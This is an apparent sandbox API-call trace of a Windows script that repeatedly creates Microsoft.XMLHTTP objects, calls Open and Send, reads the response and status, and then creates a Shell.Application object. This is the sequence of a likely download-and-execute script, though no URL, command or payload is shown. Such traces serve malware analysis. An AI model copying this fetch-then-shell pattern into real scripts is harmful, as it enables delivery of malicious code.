	[0503.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.624] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.624] SysStringLen (param_1=0x0) returned 0x0
	[0503.624] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.625] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0503.625] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0503.625] ??2@YAPEAX_K@Z () returned 0x62f310
	[0503.625] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.625] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0503.625] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.625] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0503.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.626] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.626] SysStringLen (param_1=0x0) returned 0x0
	[0503.626] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.626] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0503.626] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0503.626] ??2@YAPEAX_K@Z () returned 0x62f330
	[0503.626] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.626] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0503.626] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.626] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0503.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.627] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.627] SysStringLen (param_1=0x0) returned 0x0
	[0503.627] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.627] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0503.627] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0503.627] ??2@YAPEAX_K@Z () returned 0x62f310
	[0503.627] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0503.627] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.627] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0503.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0503.627] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0503.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.627] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0503.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.628] longjmp () 
	[0503.628] longjmp () 
	[0503.628] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.628] SysStringLen (param_1=0x0) returned 0x0
	[0503.628] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.628] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0503.628] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0503.628] ??2@YAPEAX_K@Z () returned 0x62f330
	[0503.628] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0503.628] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.628] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0503.628] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0503.628] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0503.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.629] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0503.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.629] longjmp () 
	[0503.629] longjmp () 
	[0503.629] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0503.629] SysStringLen (param_1=0x0) returned 0x0
	[0503.629] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0503.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0503.629] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0503.629] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0503.629] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0503.629] ??2@YAPEAX_K@Z () returned 0x62f310
	[0503.629] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0503.629] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0503.630] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0503.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0503.630] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0503.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0503.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0503.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0503.630] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0503.630] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0505.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0505.589] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0505.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0505.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0505.589] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0505.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0505.590] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0505.590] SysStringLen (param_1=0x0) returned 0x0
	[0505.590] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0505.590] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0505.590] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0505.590] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
